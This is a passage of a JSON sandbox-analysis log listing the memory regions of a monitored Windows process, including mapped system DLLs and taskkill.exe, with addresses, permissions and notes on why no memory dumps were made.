was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3146", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:26.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3147", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:26.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3148", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:26.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_3149", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:26.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_3150", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:26.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 14745600, "type": "region", "version": 1 }, "end_va": 14835711, "entry_point": 14769289, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3151", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 14745600, "timestamp": "00:01:26.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3152", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:26.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3153", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:26.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3154", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:26.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3155", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:26.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3156", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:26.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3157", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:26.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3158", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:26.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3159", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:26.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3160", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:26.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_3161", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:01:26.488", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3162", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:26.488", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3163", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:26.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3164", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:26.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3165", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:26.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3166", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:26.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3167", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:26.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3168", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:26.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1142783, "entry_point": 720896, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3169", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 720896, "timestamp": "00:01:26.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 7012351, "entry_point": 0, "filename": null, "id": "region_3170", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:01:26.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 8978432, "type": "region", "version": 1 }, "end_va": 9043967, "entry_point": 0, "filename": null, "id": "region_3171", "name": "private_0x0000000000890000", "norm_filename": null, "region_type": "private_memory", "start_va": 8978432, "timestamp": "00:01:26.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783562240, "type": "region", "version": 1 }, "end_va": 1784524799, "entry_point": 1783567310, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3172", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783562240, "timestamp": "00:01:26.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787645951, "entry_point": 1787433941, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3173", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:26.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787695777, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3174", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:26.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787793407, "entry_point": 1787762086, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3175", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:26.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787822080, "type": "region", "version": 1 }, "end_va": 1787891711, "entry_point": 1787826944, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3176", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787822080, "timestamp": "00:01:26.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3177", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:26.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3178", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:26.530", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3179", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:26.530", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3180", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:26.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3181", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:26.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3182", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:26.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3183", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:26.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3184", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:26.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3185", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:26.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3186", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:26.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3187", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:26.534", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3188", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:26.534", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3189", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:26.535", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3190", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:26.535", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3191", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:26.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3192", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:26.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3193", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:26.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3194", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:26.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3195", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:26.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3196", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:26.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3197", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:26.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3198", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:26.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3199", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:26.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3200", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:26.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 3637247, "entry_point": 0, "filename": null, "id": "region_3201", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:26.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3202", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:26.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3203", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:26.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3204", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:26.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1187839, "entry_point": 0, "filename": null, "id": "region_3205", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:26.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region 